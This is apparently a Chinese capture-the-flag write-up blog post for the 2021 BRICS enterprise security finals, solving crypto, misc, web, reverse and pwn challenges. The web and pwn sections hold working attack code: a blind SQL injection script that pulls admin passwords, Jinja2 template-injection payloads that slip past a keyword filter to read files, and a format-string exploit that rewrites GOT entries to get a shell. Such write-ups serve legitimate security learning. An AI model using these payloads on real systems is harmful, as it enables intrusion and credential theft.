2021金砖企业信息系统安全决赛

2021年就比完了初赛,但是因为疫情没能办成决赛,今年6月重启了比赛

Crypto

Crypto-1

base64->base32->base64–>base64

Crypto-2

变种凯撒

上图引用的caesar是自定义的模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
class caesar:
    """
        Type==1: Offset letters only
        Type==2: Offset numbers only
        Type==3: 1+2
        Type==4: All characters
    """
    def __init__(self):
        text=""
        self.Type=1

    def setType(self,Type):
        if Type in [1,2,3,4]:
            self.Type=Type
        else:
            print("Invalid type")

    def encode(self,text,num):
        entext=''
        if self.Type==1:
            for i in range(0,len(text)):
                if text[i].isupper():
                    decup=(ord(text[i])-65+num)%26
                    entext+=chr(decup+65)
                elif text[i].islower():
                    decup=(ord(text[i])-97+num)%26
                    entext+=chr(decup+97)
                else:
                    entext+=text[i]
            self.entext=entext
        elif self.Type==2:
            for i in range(0,len(text)):
                if text[i].isnumeric():
                    decup=(ord(text[i])-0x30+num)%10
                    entext+=chr(decup+0x30)
                else:
                    entext+=text[i]
            self.entext=entext
        elif self.Type==3:
            for i in range(0,len(text)):
                if text[i].isupper():
                    decup=(ord(text[i])-65+num)%26
                    entext+=chr(decup+65)
                elif text[i].islower():
                    decup=(ord(text[i])-97+num)%26
                    entext+=chr(decup+97)
                elif text[i].isnumeric():
                    decup=(ord(text[i])-0x30+num)%10
                    entext+=chr(decup+0x30)
                else:
                    entext+=text[i]
            self.entext=entext
        elif self.Type==4:
            for i in range(0,len(text)):
                decup=(ord(text[i])-0x30+num)%128
                entext+=chr(decup)
            self.entext=entext
        return self.entext
    def decode(self,text,num=0):
        detext=''
        self.delist=[]
        self.detext=''
        if self.Type==1:
            for j in range(num%26,26):
                detext=''
                for i in range(0,len(text)):
                    if text[i].isupper():
                        decup=(ord(text[i])-65+j)%26
                        detext+=chr(decup+65)
                    elif text[i].islower():
                        decup=(ord(text[i])-97+j)%26
                        detext+=chr(decup+97)
                    else:
                        detext+=text[i]
                self.delist.append(detext)
                if num:
                    self.detext=detext
        elif self.Type==2:
            for j in range(num%10,10):
                detext=''
                for i in range(0,len(text)):
                    if text[i].isnumeric():
                        decup=(ord(text[i])-0x30+j)%10
                        detext+=chr(decup+0x30)
                    else:
                        detext+=text[i]
                self.delist.append(detext)
                if num:
                    self.detext=detext
        elif self.Type==3:
            for j in range(num%26,26):
                for k in range(num%10,10):
                    detext=''
                    for i in range(0,len(text)):
                        if text[i].isupper():
                            decup=(ord(text[i])-65+j)%26
                            detext+=chr(decup+65)
                        elif text[i].islower():
                            decup=(ord(text[i])-97+j)%26
                            detext+=chr(decup+97)
                        elif text[i].isnumeric():
                            decup=(ord(text[i])-0x30+k)%10
                            detext+=chr(decup+0x30)
                        else:
                            detext+=text[i]
                    self.delist.append(detext)
                    if num:
                        self.detext=detext;
        elif self.Type==4:
            for j in range(num%128,128):
                detext=''
                for i in range(0,len(text)):
                    decup=(ord(text[i])-128+j)%128
                    detext+=chr(decup)
                self.delist.append(detext)
                if num:
                    self.detext=detext
        if len(self.detext):
            return self.detext
        if len(self.delist):
            return self.delist

两次base64得到flag

Crypto-3

先分解n

e和phi不互素

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import gmpy2

n = 22418636922065508104264650472638100390507346675022700253583060418349386472260539292033574216754214047540225287240029292436219548116787251605020424767984000804727346173028308816952737183433110999995264950414364145519999339949396799207404153148796900954086093431917244453864253649011176295266497073733547832171165497506613139960587280135867463235266546869960044777350378595302570142110464582590415694749192915651700844268466357439219626769665355230647219887042871785185100743750953935872489085346311527806979246650668966304323450610041756764667276881295676841136337294903126776228640645138477063815764467811948872156311
e = 180
c = 17971123746814947059314270113966290245749007752378241906733564181493060407114219968936077930494933520528427074831694818994710527963410153282657079091353179846750982127804195747725871635911272654572811618799762595633801414107052800867035212498914627567940429340162711284873714117628807667324064684965941290688518710890089086623981356782977499005308798890348799101436318386502089586589964942282091818134339082321114129830959264557408611168516265190076744300272908807347811446203373025446057616713876047942653095947804696077860211107853183353180163392501353685418796451123620066941329424857070023018877454625734091037559
q = 149728544112555599590936673615696271318636529352637830106348687941183054498250042553549708433208468004536400117026086238076264785396396599290721801532887662723160698502186620809003309343021490868380464762486274154096814166441270611631342173101926176645742035350917214925625954628200341278782929951624259583527
p = 149728544112555599590936673615696271318636529352637830106348687941183054498250042553549708433208468004536400117026086238076264785396396599290721801532887662723160698502186620809003309343021490868380464762486274154096814166441270611631342173101926176645742035350917214925625954628200341278782929951624259582993

n1=n-p-q+1
t=gmpy2.gcd(e,n1)
e=e//t
d=gmpy2.invert(e,n1)
m=gmpy2.powmod(c,d,n)
msg=gmpy2.iroot(m,t)
print(bytes.fromhex(hex(msg[0])[2:]))

Crypto-4

ADFGVX解密
百度得到原题

Misc

Misc-1

直接strings

Misc-2

binwalk分解出一堆zlib文件
使用ls | grep -v zlib | xargs strings命令可以发现结尾有一串字符串
两次base64后得到flag

Misc-3

文件尾发现id you try lsb?
stegsolve发现ff d8,另存为jpg

十六进制模式下发现一串字符串

base64解密后得到flag

Misc-4

音频文件,播放后具有非常明显的sstv特征
在手机上使用robot36监听得到flag

WEB

Web-1

在js中可以看到游戏的逻辑

访问23881361B86C77CD.php,点击key在这里会跳转,抓包,在返回值中得到flag

Web-2

简单过滤的sql盲注
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
import urllib.parse
def sqlinjet(url,payload):
    header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
        'Cookie': "UM_distinctid = 175b18dcb384ba-0f290792fb4f06-230346d-144000-175b18dcb39493;CNZZDATA1261218610 =1200642698-1605001662-%7C1605366994",
        "Content-Type": "application/x-www-form-urlencoded"
            }
    flag=''
    for i in range(1,100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while(low < high):
            data = {
                'uname': payload.format(i,mid),
                'passwd': "1",
            }
            r = requests.post(url=url,data=data,headers=header)
            print(data)
            if '不存在此用户' in r.text:
               low = mid + 1
            else:
               high = mid
            mid = (low + high) // 2
        flag += chr(mid)
        print(flag)
        if mid == 32 or mid == 132:
            break

url='http://101.133.132.222:8002/login.php'
payload_all_database=""
payload_database="1'^(ascii(substring((select(database()))from({})))>{})^'1"
payload_table="1'^(ascii(substring((select(group_concat(table_name))from(sys.schema_auto_increment_columns)where(table_schema=database()))from({})))>{})^'1"

uname="1'^(ascii(substring((select(group_concat(uname))from(admin))from({})))>{})^'1"
password="1'^(ascii(substring((select(group_concat(passwd))from(admin))from({})))>{})^'1"
sqlinjet(url,password)

注入得到密码,md5解密后得到5555666

登录拿到flag

Web-4

扫描目录得到index.php.bak

得到部分源代码

1
md5($_GET['name']) == md5($_GET['pwd'])

php弱比较,传入两个数组即可

payload:
http://101.133.132.222:8004/index.php?name[]=admin&pwd[]=admin123

Web-5

题目url后的路径可控,会直接回显出来
尝试xssssti
发现存在xss,但是xss不好利用,使用{{7*7}}测试,发现也存在ssti注入

报错后得到框架是jinja2

fuzz后发现过滤了class.关键字,可以通过加号拼接class来绕过

先获取FileLoader
http://101.133.132.222:8005/{{()['__cla'+'ss__'].__base__['__subclas'+'ses__']()}}

调用类get_data方法读文件
http://101.133.132.222:8005/{{()['__cla'+'ss__'].__base__['__subclas'+'ses__']()[79]["get_data"](0,"/flag")}}

Reverse

Reverse-1

直接strings

PWN

Pwn-1

查看代码发现main函数中存在两次格式化字符串

通过第一次格式化字符串获取__libc_start_main函数地址
同时获取libc地址,通过libc获取system函数地址

通过第二次格式化字符串将fini_array替换为main函数
使我们可以再次输入数据,并把printf函数在got表中的数据修改为system函数地址
这样在第二次执行main函数时,输入/bin/shsh就可以执行system("/bin/sh")来获取shell

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
libc=ELF('libc-2.23.so',checksec=0)
e=ELF('./pmagic',checksec=0)
p=remote('106.14.91.65',10000)
#p=process('pmagic')
#gdb.attach(p,'bp 0x400838')
p.readuntil('name.\n')
p.send('%43$p')
d=int(p.readuntil('Say',drop=1)[:-1],16)-240
libc.address=d-libc.sym['__libc_start_main']
system=libc.sym['system']
fini=0x600a78
printf=e.got['printf']
main=0x400797
print(hex(main))
print(hex(fini))
print(hex(system))
print(hex(printf))

a=[0x97,0x7,0x40]
i=system
while i!=0:
    a.append(i&0xff)
    i=i>>8


b=[fini,fini+1,fini+2,printf,printf+1,printf+2,printf+3,printf+4,printf+5]
c={}
for i in range(0,len(a)):
    c[a[i]]=b[i]

a.sort()
print(a)
print(b)
print(c)
payload=''
n=0

for i in range(0,len(a)):
    if i>0:
        payload+='%'+str(a[i]-a[i-1])+'c%'+str(28+i)+'$hhn'
    else:
        payload+='%'+str(a[i])+'c%'+str(28+i)+'$hhn'
    n=n+1
print(hex(len(payload)))
payload=payload.ljust(0xa0,'a')

for i in a:
    payload+=p64(c[i])

print(hex(len(payload)))
print(payload)
p.sendline(payload)

p.interactive()

wp
#wp #2021 #金砖
2021金砖企业信息系统安全决赛
https://www.dr0n.top/posts/281f37d9/
作者
dr0n
发布于
2022年6月9日
更新于
2024年3月21日
许可协议